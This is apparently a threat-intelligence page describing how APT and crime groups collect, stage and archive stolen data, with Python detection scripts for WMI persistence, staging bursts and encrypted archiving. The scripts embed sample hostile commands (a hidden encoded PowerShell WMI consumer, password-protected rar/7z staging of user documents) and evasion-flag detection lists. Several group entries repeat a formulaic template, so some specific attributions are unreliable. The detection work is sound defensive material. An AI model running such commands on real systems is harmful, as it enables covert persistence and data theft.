Procedures

Data from Local System

  • Operation Wocao: This campaign, reported by Fox-IT and attributed to the Chinese group APT20, combined custom tools, open-source software, and known exploits to collect data from compromised hosts. Initial access came through phishing or the exploitation of vulnerable systems; once inside, the operators deployed keyloggers to capture typed input, manipulated system services, and searched the local file system for sensitive files. Collected data was staged locally and then copied to attacker-controlled infrastructure with remote file copy tools. Pulling files straight from compromised hosts rarely trips network-edge controls, so detection has to focus on unusual local file access and staging activity.

  • Turla Group (Snake): Turla, known for cyber-espionage activities, utilizes PowerShell scripts to collect data while avoiding detection. They achieve persistence by creating Windows Management Instrumentation (WMI) event filters and altering PowerShell profile scripts, allowing continuous execution of their scripts. These scripts decrypt and load malware directly into memory, bypassing traditional file-based detection mechanisms. Once active, the malware captures system information, user activities, and other sensitive data. This data is then packaged and encrypted before being transmitted to Turla's command and control servers. By using in-memory execution and avoiding disk writes, Turla effectively gathers and exfiltrates data from local systems with minimal detection risk.

  • Operation Sheep: Hangzhou Shun Wang Technologies embedded its SWAnalytics SDK into popular Android applications to harvest data from users' devices. When an app containing the SDK was opened, or the device rebooted, it requested broad permissions and read the contact list and other personal information. The harvested data, including contacts and QQ login details, was encrypted with double DES and sent to remote servers under the vendor's control. Embedding the SDK in widely used apps gave the operation a very large collection footprint, and it illustrates that a third-party SDK inherits every permission the host app is granted.

  • Operation Pistacchietto: This campaign targeted Italian entities through deceptive fake Java update pages, tricking users into downloading a malicious batch file. This file escalated privileges and achieved persistence by scheduling tasks through the Windows Task Scheduler. The malware then collected data by downloading additional utilities like Netcat and Wget, which were used to transfer information from local systems. The batch file manipulated system directories and services to maintain its presence, continuously gathering data without detection. The collected data was staged locally before being transferred to the attacker's servers. This method demonstrates how social engineering and system exploitation can effectively collect data from compromised systems.

  • APT3 (Gothic Panda/UPS Team): A China-based group known for spear phishing and browser exploits that deliver malware such as Pirpi and PlugX. Once inside a network, the operators run reconnaissance tools such as OSInfo to enumerate system and user details, then compress and encrypt the selected data with tools like WinRAR and stage it on local hosts before moving it to external servers. Valid credentials and brute-force attacks support lateral movement, so data is gathered from many hosts rather than only from the initial foothold.

  • Antlion APT: This Chinese state-backed group targets financial institutions in Taiwan with the xPack backdoor, which executes commands and dumps credentials through WMIC. Persistence comes from registry modifications, and PowerShell scripts handle much of the data collection. The malware repeatedly dumps credentials and gathers system information, stages the results locally, and uses legitimate tools to move the staged data to command and control servers. Because the dump, stage and transfer loop is repeated over long periods, the group extracts a large volume of intelligence from local systems without deploying new tooling.
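The Turla entry above describes two persistence mechanisms that feed its in-memory collection scripts: WMI event subscriptions and modified PowerShell profiles. The following hunt is an added example written for this page, not Turla tooling or any vendor's detection content; it correlates Sysmon-style records for Event IDs 19, 20 and 21 (WMI filter, consumer and binding) and Event ID 11 (FileCreate) and flags bindings whose consumer runs a script host with evasion switches, plus writes to any PowerShell profile path. The record format, field names and sample events are constructed for the example.

```python
"""Hunt for WMI event-subscription persistence and PowerShell profile
tampering in Sysmon-style telemetry. Added example; the records below are
constructed to resemble Sysmon Event IDs 19/20/21 (WMI filter, consumer,
binding) and 11 (FileCreate), not real telemetry from any campaign."""
import re

# Consumer types that execute arbitrary commands or scripts.
ACTIVE_CONSUMER_TYPES = ("Command Line", "Script")
# Script/LOLBin hosts and PowerShell evasion switches worth flagging in a consumer.
SUSPICIOUS_HOSTS = ("powershell", "pwsh", "cmd.exe", "wscript", "cscript",
                    "mshta", "regsvr32", "rundll32")
EVASION_FLAGS = ("-enc", "-w hidden", "-nop", "bypass", "iex", "downloadstring")
# All-hosts and per-user profile locations for Windows PowerShell and pwsh.
PROFILE_RE = re.compile(
    r"\\(?:windowspowershell|powershell)\\(?:v1\.0\\)?(?:microsoft\.powershell_)?profile\.ps1$",
    re.IGNORECASE,
)

def parse_event(line):
    """'Key=value|Key=value' -> dict; values may themselves contain '=' (WQL, base64)."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields

def wmi_object_name(ref):
    """Sysmon reports bindings as e.g. CommandLineEventConsumer.Name="Updater"; extract the name."""
    m = re.search(r'Name="([^"]+)"', ref)
    return m.group(1) if m else ref

def hunt(lines):
    filters, consumers, bindings, findings = {}, {}, [], []
    for ev in map(parse_event, lines):
        eid = ev.get("EventID")
        if eid == "19":                       # WmiEventFilter
            filters[ev["Name"]] = ev.get("Query", "")
        elif eid == "20":                     # WmiEventConsumer
            consumers[ev["Name"]] = ev
        elif eid == "21":                     # WmiEventConsumerToFilter
            bindings.append((wmi_object_name(ev["Consumer"]), wmi_object_name(ev["Filter"])))
        elif eid == "11" and PROFILE_RE.search(ev.get("TargetFilename", "")):
            findings.append({"kind": "powershell_profile_write",
                             "image": ev.get("Image", ""), "path": ev["TargetFilename"]})
    # A subscription only fires once filter and consumer are bound, so judge the binding.
    for consumer_name, filter_name in bindings:
        consumer = consumers.get(consumer_name, {})
        if consumer.get("Type") not in ACTIVE_CONSUMER_TYPES:
            continue                          # e.g. the built-in NTEventLog "SCM Event Log Consumer"
        dest = consumer.get("Destination", "").lower()
        reasons = [h for h in SUSPICIOUS_HOSTS if h in dest] + [f for f in EVASION_FLAGS if f in dest]
        if reasons:
            findings.append({"kind": "wmi_subscription", "consumer": consumer_name,
                             "filter": filter_name, "query": filters.get(filter_name, ""),
                             "destination": consumer.get("Destination", ""), "reasons": reasons})
    return findings

SAMPLE_EVENTS = [  # constructed records; the -Enc payload is a placeholder, not a real script
    r"EventID=19|Operation=Created|User=CORP\svc_backup|EventNamespace=root\subscription|Name=Updater|Query=SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325",
    r"EventID=20|Operation=Created|User=CORP\svc_backup|Name=Updater|Type=Command Line|Destination=powershell.exe -NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    r'EventID=21|Operation=Created|User=CORP\svc_backup|Consumer=CommandLineEventConsumer.Name="Updater"|Filter=__EventFilter.Name="Updater"',
    r"EventID=20|Operation=Created|User=NT AUTHORITY\SYSTEM|Name=SCM Event Log Consumer|Type=NTEventLog|Destination=sid=S-1-5-32-544, Category=0, EventType=1",
    r'EventID=21|Operation=Created|User=NT AUTHORITY\SYSTEM|Consumer=NTEventLogEventConsumer.Name="SCM Event Log Consumer"|Filter=__EventFilter.Name="SCM Event Log Filter"',
    r"EventID=11|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|TargetFilename=C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1",
    r"EventID=11|Image=C:\Windows\explorer.exe|TargetFilename=C:\Users\alice\Documents\notes.txt",
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

The uptime-window WQL filter in the sample is the classic "run shortly after boot" trigger; the hunt reports the query alongside the consumer so an analyst sees both the trigger and the payload in one finding, and the built-in SCM subscription is ignored because its consumer type only writes an event log entry.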

Screen Capture

  • APT29 (Cozy Bear): This Russian state-backed group uses sophisticated malware to capture screen activity for espionage purposes. They deploy the "CosmicDuke" malware which includes a screen capture module that activates at scheduled intervals or when specific applications are opened. The malware captures screenshots of the victim’s desktop, focusing on sensitive activities such as document editing or email composition. These screenshots are then encrypted and stored in hidden directories on the local system. APT29 uses customized exfiltration methods to transmit the captured screenshots to their command and control servers, often utilizing secure HTTPS connections to avoid detection. By capturing screens during key activities, they gather valuable intelligence without relying solely on traditional data theft methods. This technique helps them monitor ongoing operations and collect sensitive information in real-time.

  • Turla (Snake): This sophisticated cyber-espionage group from Russia employs screen capturing as part of their data collection tactics. They use the "Carbon" and "Kazuar" backdoors which have built-in capabilities for taking screenshots of the victim’s desktop. These tools are configured to capture screenshots at regular intervals or when specific user actions are detected, such as opening email clients or accessing sensitive documents. The captured images are compressed and encrypted before being stored locally. Turla then schedules data exfiltration tasks to send the screenshots to their remote servers, often using stealthy network communication protocols to evade detection. This screen capture technique allows them to visually document the victim's activities, providing insights into their operations and sensitive information being handled.

  • APT10 (Stone Panda): Known for targeting various industries globally, this Chinese state-sponsored group employs screen capture as part of their cyber-espionage activities. They use the "QuasarRAT" malware, which includes a module for capturing screenshots. The malware is configured to take screenshots when certain keywords are detected or specific applications are in use. These screenshots are saved in encrypted formats to prevent easy access by security software. APT10 uses encrypted channels to upload the screenshots to their command and control infrastructure, ensuring that the data transfer remains undetected. This method allows them to capture real-time visual data, supplementing other collected information such as keystrokes and system files. Screen captures help APT10 understand the victim’s workflows and access sensitive documents or communications.

  • DarkHotel: This cyber-espionage group targets business executives and government officials, using advanced malware for screen capture. They deploy the "Inexsmar" malware which includes screen capture functionalities activated under specific conditions, like opening confidential documents or accessing secure portals. The malware captures periodic screenshots, focusing on areas of the screen where sensitive information is likely to be displayed. These images are stored in encrypted files to avoid detection and are periodically exfiltrated to remote servers. DarkHotel uses secure, often encrypted, communication channels for transferring the captured data, minimizing the risk of interception. The screen capture capability allows them to gather detailed visual information about the victim’s activities, supplementing other forms of collected data for comprehensive espionage operations.

  • Cobalt Group: A financially motivated cybercrime group that uses screen capture to steal sensitive financial information. They deploy the "CobInt" malware, which includes a screen capture module triggered by specific financial applications or keywords. The malware captures screenshots whenever the victim accesses banking websites or financial management software. These screenshots are then encrypted and stored locally until they can be exfiltrated to the group’s command and control servers. The Cobalt Group uses various techniques, such as encrypted HTTP traffic, to transfer the captured screenshots, ensuring stealth and avoiding detection by network security tools. This method enables them to capture critical financial information, such as account details and transaction confirmations, which can be used for further fraudulent activities.

  • FIN7 (Carbanak): This notorious cybercrime group uses sophisticated malware to capture screens for financial gain. They utilize the "Carbanak" malware, which includes a screen capture feature that activates when victims interact with point-of-sale (POS) systems or financial databases. The malware captures screenshots of the desktop at intervals or based on specific triggers, such as logging into a bank account. These screenshots are saved in encrypted files on the compromised system. FIN7 then exfiltrates the data through encrypted channels to avoid detection. The screen captures provide detailed visual records of financial transactions and sensitive information entered by the victim, enabling FIN7 to commit theft and fraud by understanding the victim's financial operations.

Input Capture: Keylogging

  • APT28 (Fancy Bear): A Russian state-sponsored group known for using keylogging as part of their cyber-espionage activities. They deploy the "X-Agent" malware, which includes a keylogging module that records keystrokes from the infected system. This module activates upon specific triggers such as accessing email clients or document editing software, capturing all typed information including usernames, passwords, and sensitive communications. The captured keystrokes are stored in encrypted logs on the local system to avoid detection. APT28 periodically exfiltrates these logs to their command and control servers using encrypted communication channels. This technique allows them to gather comprehensive insights into the victim’s activities, access credentials, and collect confidential information.

  • Emotet: Originally a banking Trojan, Emotet has evolved into a modular malware used primarily for delivering other payloads, including keyloggers. When deployed, Emotet’s keylogging module records all keystrokes entered on the infected machine, capturing sensitive information such as login credentials and financial data. The captured data is encrypted and stored locally, then periodically uploaded to the attackers' command and control servers. Emotet uses advanced evasion techniques to avoid detection, such as hiding its presence by injecting itself into running processes. This allows the attackers to collect valuable information without alerting the victim. The keylogged data is often used for further attacks, including financial fraud and identity theft.

  • Cobalt Group: A cybercrime group known for targeting financial institutions and deploying keyloggers to steal sensitive data. They use the "CobInt" malware, which includes a keylogging module that activates when users interact with financial applications. The malware records all keystrokes, capturing information such as account credentials, transaction details, and confidential communications. The captured keystrokes are encrypted and stored locally to avoid detection by security software. Cobalt Group periodically exfiltrates this data to their command and control infrastructure, often using encrypted channels. This method allows them to collect detailed financial information which can be used for fraud and further criminal activities.

  • APT32 (OceanLotus): A Vietnamese state-sponsored group that uses keylogging as part of a broad cyber-espionage toolkit. The tools commonly cited for the group, KerrDown (a downloader) and Ratsnif (a network sniffing and ARP-poisoning tool), do not themselves record keystrokes; keylogging is performed by separate payloads that the downloader stages. Those payloads activate on specific applications or activities, capture credentials and confidential communications, store the recorded keystrokes in encrypted files on the compromised system, and the logs are exfiltrated to command and control servers over encrypted connections. The technique gives the group credentials and communications from government and private-sector targets.

  • FIN7 (Carbanak): A financially motivated cybercrime group that uses keylogging to steal sensitive financial information. They employ the "Carbanak" malware which includes a keylogging module that records keystrokes when victims use point-of-sale (POS) systems or access financial databases. The captured keystrokes include login credentials, payment card details, and other sensitive financial data. This information is encrypted and stored locally before being exfiltrated to FIN7's command and control servers. FIN7 uses sophisticated evasion techniques to avoid detection, ensuring the continuous collection of valuable data. The keylogged information is then used for financial fraud and other malicious activities.

  • Lazarus Group: A North Korean state-sponsored group known for using keyloggers as part of their cyber-espionage and financial theft campaigns. They deploy malware like "Bankshot" which includes keylogging functionality to capture keystrokes from infected systems. The keylogger activates when specific applications are used, such as email clients and financial software, recording all typed information. The captured keystrokes are encrypted and stored in hidden files on the local system. Lazarus Group periodically exfiltrates these logs to their command and control servers using secure communication methods. This allows them to collect detailed information for espionage and financial gain, including login credentials and sensitive communications.

Data Staged: Local Data Staging

  • APT1 (Comment Crew): A Chinese state-sponsored group known for its extensive cyber-espionage activities targeting various industries. They deploy malware such as "WEBC2" and "Trojan.Downbot" which collect data from compromised systems and store it in hidden directories on local disks. The malware aggregates sensitive documents, emails, and credentials, compressing them into encrypted archives to avoid detection. The staged data is periodically transferred to temporary local folders, where it awaits exfiltration. APT1 uses scheduled tasks to manage the timing of data transfers, ensuring continuous collection without alerting the victim. This method allows them to efficiently manage and prepare large volumes of data for exfiltration, maintaining a low profile while gathering intelligence.

  • APT28 (Fancy Bear): This Russian cyber-espionage group stages collected data on local systems before exfiltration. They use malware like "Sofacy" and "X-Agent" to harvest sensitive information such as emails, documents, and login credentials. The collected data is stored in encrypted files within hidden directories on the victim's machine. APT28 uses scripts to regularly move and update the data, ensuring it remains current and comprehensive. These files are then exfiltrated in batches to remote servers controlled by the group. By staging data locally, APT28 can carefully manage and secure the collected information before transmission, reducing the risk of detection during the exfiltration process.

  • FIN7 (Carbanak): This financially motivated cybercrime group stages stolen data on local systems to facilitate exfiltration. They use malware like "Carbanak" and "GratefulPOS" to collect data from point-of-sale systems and financial applications. The gathered data, including payment card information and transaction records, is stored in encrypted files on the local system. FIN7 schedules the movement of these files to less scrutinized directories to evade detection. They then use secure, encrypted channels to periodically transfer the staged data to their remote servers. This staging process ensures that large volumes of data can be collected and managed efficiently before being sent to the attackers' infrastructure.

  • Lazarus Group: A North Korean state-sponsored group that stages data on local systems as part of their cyber-espionage and financial theft operations. They deploy malware such as "Bankshot" and "Fallchill" to collect sensitive information from infected networks. The data, including financial records and intellectual property, is aggregated into encrypted archives stored in hidden directories. Lazarus Group uses custom scripts to periodically organize and update these archives, preparing them for exfiltration. The staged data is then exfiltrated in controlled batches to remote servers, often using encrypted communication methods to avoid detection. This method allows them to efficiently handle and secure large amounts of stolen data before exfiltration.

  • Turla (Snake): This Russian cyber-espionage group stages collected data on local systems using sophisticated malware. They deploy tools like "Carbon" and "Kazuar" to gather sensitive information such as documents, emails, and system configurations. The collected data is stored in encrypted files within hidden directories on the compromised system. Turla uses automated scripts to regularly update and move the data, ensuring it remains comprehensive and current. The staged data is then transferred in encrypted batches to their command and control servers. By staging data locally, Turla can manage and secure the information effectively before exfiltration, reducing the risk of detection during data transfer.

  • Operation Wocao: This sophisticated threat actor stages collected data on local systems before exfiltration to manage large volumes of information efficiently. They use custom malware to harvest sensitive data such as financial records, intellectual property, and user credentials from compromised systems. The data is encrypted and stored in hidden directories, where it is periodically organized and updated by automated scripts. Operation Wocao uses scheduled tasks to move the data to less scrutinized areas of the file system, preparing it for exfiltration. The staged data is then exfiltrated in encrypted batches to remote servers controlled by the attackers. This method allows them to maintain a low profile while ensuring the secure and efficient transfer of stolen data.
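Every entry in this section follows the same pattern: a process writes many collected files, and then an archive, into a directory that normal users rarely touch. The detection below is an added example for this page (not code from any of the groups or vendors named above) that runs over constructed Sysmon Event ID 11 (FileCreate) style records and raises an alert when one process creates a burst of files, or an archive, inside a staging-like path. The record format, the list of staging paths, the window and the threshold are assumptions to be tuned per environment.

```python
"""Detect local data staging (ATT&CK T1074.001): one process writing a burst
of files, or an archive, into a directory commonly used to park collected
data. Added example; events are constructed to resemble Sysmon Event ID 11
(FileCreate) and are not from any of the campaigns above."""
from collections import defaultdict
from datetime import datetime, timedelta

# Substrings that mark typical staging locations (assumption; tune per estate).
STAGING_HINTS = (
    "\\programdata\\", "\\users\\public\\", "\\appdata\\local\\temp\\",
    "\\$recycle.bin\\", "\\perflogs\\", "\\windows\\temp\\", "\\windows\\tasks\\",
)
ARCHIVE_EXTENSIONS = (".rar", ".zip", ".7z", ".cab", ".tar", ".gz")
TS_FORMAT = "%Y-%m-%dT%H:%M:%SZ"

def parse_events(lines):
    """'timestamp|pid|image|target' -> time-sorted list of (datetime, pid, image, target)."""
    events = []
    for line in lines:
        ts, pid, image, target = line.split("|", 3)
        events.append((datetime.strptime(ts, TS_FORMAT), int(pid), image, target))
    events.sort()
    return events

def max_in_window(times, window):
    """Largest number of (sorted) timestamps that fall inside any window-long interval."""
    best, start = 0, 0
    for end in range(len(times)):
        while times[end] - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best

def detect_staging(lines, window=timedelta(minutes=5), min_files=20):
    writes = defaultdict(list)
    for ts, pid, image, target in parse_events(lines):
        directory = target.rsplit("\\", 1)[0].lower() + "\\"
        writes[(pid, image, directory)].append((ts, target))
    alerts = []
    for (pid, image, directory), items in writes.items():
        if not any(h in directory for h in STAGING_HINTS):
            continue                      # bursts into ordinary user or share paths are normal work
        burst = max_in_window([t for t, _ in items], window)
        if burst >= min_files:
            alerts.append({"kind": "burst", "pid": pid, "image": image,
                           "directory": directory, "count": burst})
        for _, path in items:
            if path.lower().endswith(ARCHIVE_EXTENSIONS):
                alerts.append({"kind": "archive_in_staging", "pid": pid, "image": image,
                               "directory": directory, "path": path, "count": 1})
    return alerts

def constructed_events():
    """Sample telemetry built inline for the example: one staging episode plus benign noise."""
    base = datetime(2024, 5, 1, 10, 0, 0)

    def rec(offset, pid, image, target):
        return f"{(base + offset).strftime(TS_FORMAT)}|{pid}|{image}|{target}"

    lines = []
    # 25 documents copied into ProgramData within 75 seconds by a single cmd.exe
    for i in range(25):
        lines.append(rec(timedelta(seconds=3 * i), 4120, "C:\\Windows\\System32\\cmd.exe",
                         "C:\\ProgramData\\Microsoft\\Cache\\doc%03d.docx" % i))
    # the archive that packages them
    lines.append(rec(timedelta(seconds=90), 4388, "C:\\Program Files\\WinRAR\\rar.exe",
                     "C:\\ProgramData\\Microsoft\\Cache\\sync.rar"))
    # benign: a few browser downloads, and a backup agent writing 30 files over two hours
    for i in range(3):
        lines.append(rec(timedelta(minutes=i), 2210, "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
                         "C:\\Users\\alice\\Downloads\\report%d.pdf" % i))
    for i in range(30):
        lines.append(rec(timedelta(minutes=4 * i), 3012, "C:\\Program Files\\Backup\\agent.exe",
                         "D:\\Backups\\vol%03d.bak" % i))
    return lines

if __name__ == "__main__":
    for alert in detect_staging(constructed_events()):
        print(alert)
```

Keying on process, directory and a sliding time window keeps the backup agent and the browser out of the results even though both write plenty of files; the archive rule fires on a single event because one RAR file appearing in ProgramData is already worth a look.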

Archive Collected Data: Archive via Utility

  • APT10 (Stone Panda): A Chinese state-sponsored group known for extensive cyber-espionage campaigns. APT10 frequently uses tools like WinRAR and 7-Zip to compress collected data into password-protected archives. Once their malware, such as PlugX or QuasarRAT, has collected the targeted information, it is packed into these archives. Password-protecting the archive defeats content inspection by DLP and antivirus scanners and keeps the contents confidential in transit. The archives are staged locally on the victim's machine, often in obscure or system directories, and then exfiltrated to remote command and control servers over secure channels. This lets APT10 package and protect the data efficiently during transmission, minimizing the risk of interception and detection.

  • FIN7 (Carbanak): A financially motivated cybercrime group that frequently employs data compression utilities to archive stolen data. They use tools like WinRAR to compress and encrypt sensitive financial information, such as payment card details and transaction logs. The malware deployed by FIN7, such as Carbanak, gathers this data from compromised point-of-sale systems and databases. After collection, the data is packaged into encrypted RAR or ZIP files to prevent easy detection by security tools. These archives are then moved to staging directories, where they await exfiltration. FIN7 uses encrypted channels to transfer the archived data to their remote servers, ensuring the information remains secure during transit. This technique allows them to handle large volumes of data efficiently while maintaining its integrity and confidentiality.

  • Turla (Snake): A Russian state-sponsored group that uses data archiving techniques to manage and exfiltrate collected information. Turla employs utilities like 7-Zip to compress and encrypt stolen data into archive files. Their malware, such as Carbon and Kazuar, collects a wide range of data, including documents, emails, and system configurations. The collected data is stored in encrypted ZIP or 7z files to avoid detection by security systems. These files are then staged in hidden or system directories, ready for exfiltration. Turla schedules the transfer of these archives to remote servers using encrypted communication channels, ensuring the data's security during transmission. This approach allows them to efficiently package and secure large amounts of data, facilitating effective and covert exfiltration.

  • APT28 (Fancy Bear): A Russian cyber-espionage group known for using data compression utilities to archive stolen information. APT28 uses tools like WinRAR and 7-Zip to create encrypted archives of collected data. Their malware, including Sofacy and X-Agent, gathers sensitive information such as emails, documents, and login credentials from targeted systems. The data is then compressed and encrypted into RAR or ZIP files, which are stored in hidden directories. These archives are periodically exfiltrated to remote command and control servers using secure, encrypted channels. By archiving data in this manner, APT28 ensures that the stolen information is protected and easily transferable, reducing the risk of detection during exfiltration.

  • Lazarus Group: A North Korean state-sponsored group that uses data archiving to handle and exfiltrate stolen data. Lazarus Group utilizes utilities like WinRAR to compress and encrypt collected information into archive files. Their malware, such as Bankshot and Fallchill, gathers data from infected systems, including financial records and intellectual property. This data is then stored in encrypted RAR files, which are hidden in system directories to avoid detection. Lazarus Group schedules the transfer of these archives to their remote servers using encrypted communication methods. This technique allows them to efficiently manage large volumes of data, ensuring its security and integrity during exfiltration.

  • Operation Wocao: This sophisticated threat actor group employs data archiving utilities to manage collected information before exfiltration. They use tools like 7-Zip to compress and encrypt data into archive files. The malware deployed by Operation Wocao collects a variety of sensitive information, including financial records, intellectual property, and user credentials. The collected data is compressed into encrypted ZIP or 7z files, which are then stored in obscure or system directories on the victim's machine. These archives are periodically moved to less scrutinized areas and exfiltrated to remote servers using secure channels. By archiving the data in this manner, Operation Wocao ensures efficient packaging and protection of the stolen information, facilitating covert and secure exfiltration.
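All six entries above describe the same tell: an archiver invoked with a password switch, writing its output into a staging directory. The parser below is an added example for this page, not tooling from any of the groups named, and it is written against constructed Sysmon Event ID 1 (process creation) style records. It recognises the WinRAR switches `-p<pw>` (encrypt data) and `-hp<pw>` (also encrypt file names) and the 7-Zip switches `-p<pw>` and `-mhe=on` (header encryption), and flags archives written to typical staging paths. The record format, archiver list and staging paths are assumptions.

```python
"""Flag archiver invocations that encrypt their output or write into staging
directories (ATT&CK T1560.001). Added example; the event lines are
constructed to resemble Sysmon Event ID 1 fields and are not real telemetry."""
import shlex
from dataclasses import dataclass

ARCHIVERS = {"rar.exe", "winrar.exe", "7z.exe", "7za.exe", "7zg.exe"}
# Directories commonly used to park collected data before exfiltration (assumption).
STAGING_HINTS = (
    "\\programdata\\", "\\temp\\", "\\$recycle.bin\\",
    "\\users\\public\\", "\\windows\\tasks\\", "\\perflogs\\",
)

@dataclass
class ArchiveFinding:
    image: str
    archive: str
    encrypted: bool          # payload protected with a password
    header_encrypted: bool   # file names hidden as well (rar -hp / 7z -mhe=on)
    staged: bool             # archive written to a typical staging directory
    flags: list

def _strip_quotes(token):
    return token[1:-1] if len(token) >= 2 and token[0] == token[-1] == '"' else token

def _tokens(command_line):
    """Split a Windows command line; non-POSIX mode keeps backslashes literal."""
    try:
        return [_strip_quotes(t) for t in shlex.split(command_line, posix=False)]
    except ValueError:                   # unbalanced quotes: fall back to whitespace split
        return command_line.split()

def analyse_archiver(image, command_line):
    """Return an ArchiveFinding if `image` is a known archiver, else None."""
    exe = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if exe not in ARCHIVERS:
        return None
    argv = _tokens(command_line)
    # argv[0] is the program, argv[1] the archiver command (a, u, m, ...); switches follow.
    flags = [t for t in argv[2:] if t.startswith("-")]
    positional = [t for t in argv[2:] if not t.startswith("-")]
    lowered = [f.lower() for f in flags]
    header = any(f.startswith("-hp") or (f.startswith("-mhe") and not f.endswith("off"))
                 for f in lowered)
    encrypted = header or any(f.startswith("-p") for f in lowered)
    archive = positional[0] if positional else ""
    staged = any(h in archive.lower() for h in STAGING_HINTS)
    return ArchiveFinding(exe, archive, encrypted, header, staged, flags)

def parse_event(line):
    """'Key: value|Key: value' -> dict (constructed record format)."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition(": ")
        fields[key.strip()] = value.strip()
    return fields

def scan_events(lines):
    findings = []
    for ev in map(parse_event, lines):
        finding = analyse_archiver(ev.get("Image", ""), ev.get("CommandLine", ""))
        if finding:
            findings.append(finding)
    return findings

SAMPLE_EVENTS = [  # constructed Sysmon Event ID 1-style records
    r'Image: C:\Program Files\WinRAR\rar.exe|CommandLine: "C:\Program Files\WinRAR\rar.exe" a -r -hpSecret123 C:\ProgramData\sync.rar "C:\Users\alice\Documents\*.docx"',
    r"Image: C:\Users\Public\7z.exe|CommandLine: 7z.exe a -pHunter2 -mhe=on -mx9 C:\Users\Public\update.7z C:\Users\alice\Desktop\finance",
    r'Image: C:\Program Files\7-Zip\7z.exe|CommandLine: "C:\Program Files\7-Zip\7z.exe" a D:\Backups\weekly.7z E:\Share\*',
    r"Image: C:\Windows\System32\notepad.exe|CommandLine: notepad.exe C:\Users\alice\notes.txt",
]

if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(finding)
```

The third record (an unencrypted backup to a backup volume) still appears in the results, with every flag false, so the same scan can feed both an alert rule (encrypted or staged) and an inventory of legitimate archiver use for baselining.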

Automated Collection

  • APT29 (Cozy Bear): A Russian state-sponsored group known for sophisticated espionage tradecraft. In the SolarWinds compromise, the "Sunburst" backdoor automatically profiled each infected host (host name, domain, user name, OS version, network adapters and the lists of running processes and services) before the operators decided whether to proceed, while "Teardrop" was a memory-only dropper that loaded a Cobalt Strike Beacon rather than a collection component. The profiling runs without operator interaction and its results travel over the backdoor's command and control channel, so thousands of hosts could be triaged automatically and only selected victims received hands-on follow-up. This let APT29 gather data at scale while concentrating manual effort on high-value targets.

  • Lazarus Group: A North Korean state-sponsored group that uses automated collection in both espionage and financial-theft campaigns. Its remote access trojans carry predefined routines that scan directories, extract specific files and log keystrokes without operator input. The FASTCash operation is a different kind of tool: malware placed on compromised bank payment-switch servers intercepted and altered ISO 8583 transaction messages to approve fraudulent ATM withdrawals, rather than collecting files. Data gathered by the collection routines is encrypted and sent to Lazarus Group's command and control servers over secure channels. Automation keeps the collection thorough and continuous and lets the group maintain persistent surveillance of targeted networks.

  • Turla (Snake): This Russian cyber-espionage group employs automated collection methods to streamline their data gathering processes. They use tools like "Carbon" and "Kazuar" which include automated modules designed to harvest emails, documents, and system configurations. These modules are configured to run at scheduled intervals or triggered by specific events, ensuring ongoing data collection. The harvested data is automatically encrypted and either stored locally for later exfiltration or immediately sent to Turla's remote servers. The use of automation allows Turla to gather large amounts of data efficiently while avoiding detection. This approach enhances their ability to conduct prolonged espionage campaigns with minimal manual intervention.

  • APT10 (Stone Panda): A Chinese state-sponsored group known for their automated data collection techniques in cyber-espionage operations. APT10 deploys malware like "QuasarRAT" and "PlugX" that include scripts for automating the collection of system information, intellectual property, and user credentials. These scripts operate continuously, gathering data based on predefined parameters and storing it in encrypted files. The data is then exfiltrated to APT10's servers using secure channels, often employing techniques to blend in with normal network traffic. Automation ensures that the data collection process is comprehensive and efficient, allowing APT10 to gather significant amounts of information with minimal oversight. This method supports their objectives of industrial espionage and intelligence gathering.

  • FIN7 (Carbanak): A financially motivated cybercrime group that utilizes automated data collection to enhance their operations. They use malware such as "Carbanak" which includes automated scripts to collect payment card data, transaction logs, and other financial information from compromised systems. These scripts are designed to scan for and extract relevant data continuously, ensuring thorough collection without manual intervention. The collected data is encrypted and stored locally before being exfiltrated to FIN7's command and control servers via secure methods. Automation allows FIN7 to maximize their data collection efforts, increasing the volume and value of the stolen information. This technique also reduces the likelihood of detection by minimizing human involvement.

  • APT32 (OceanLotus): A Vietnamese state-sponsored group that employs automated data collection in their cyber-espionage activities. They deploy malware like "Ratsnif" and "KerrDown" that include automated scripts for gathering system information, emails, and documents. These scripts run silently in the background, executing predefined tasks such as scanning directories and extracting specific types of files. The data is automatically encrypted and sent to APT32's command and control infrastructure via secure channels. Automation ensures that data collection is continuous and comprehensive, allowing APT32 to maintain persistent surveillance over their targets. This approach enables them to gather large amounts of valuable information with minimal manual oversight, enhancing their espionage capabilities.

Video Capture

  • APT37 (Reaper): A North Korean state-sponsored group known for using video capture to monitor and gather intelligence from their targets. They deploy malware such as "RevengeRAT" which includes functionalities to record video from the victim's webcam. The malware activates the webcam without user knowledge and records footage, particularly when specific activities or applications are detected. These video files are stored locally in encrypted formats to evade detection. Periodically, the recorded videos are exfiltrated to APT37's command and control servers using secure communication channels. This technique allows them to gather real-time intelligence and monitor sensitive activities, enhancing their surveillance capabilities.

  • APT28 (Fancy Bear): A Russian state-sponsored cyber-espionage group that incorporates video capture into their data collection methods. They utilize tools like "X-Agent" which can access and record video from the victim’s webcam. The malware activates the webcam and captures video footage, particularly when the user engages in activities of interest such as accessing sensitive documents or communications. The video files are encrypted and stored in hidden directories on the victim’s machine. APT28 then uses secure channels to transfer the recorded videos to their remote servers. This method provides them with valuable visual intelligence and helps in understanding the victim’s environment and actions.

  • Turla (Snake): This Russian cyber-espionage group uses video capture to gather additional intelligence from their targets. They employ malware like "Carbon" which includes features to activate the victim’s webcam and record video. The malware captures video when certain conditions are met, such as the presence of specific applications or activities. The recorded video is encrypted and stored locally, often in hidden directories to avoid detection. Turla schedules regular exfiltration of these video files to their command and control servers using encrypted communication methods. Video capture allows them to monitor the victim’s physical environment and activities, providing a richer context for their espionage efforts.

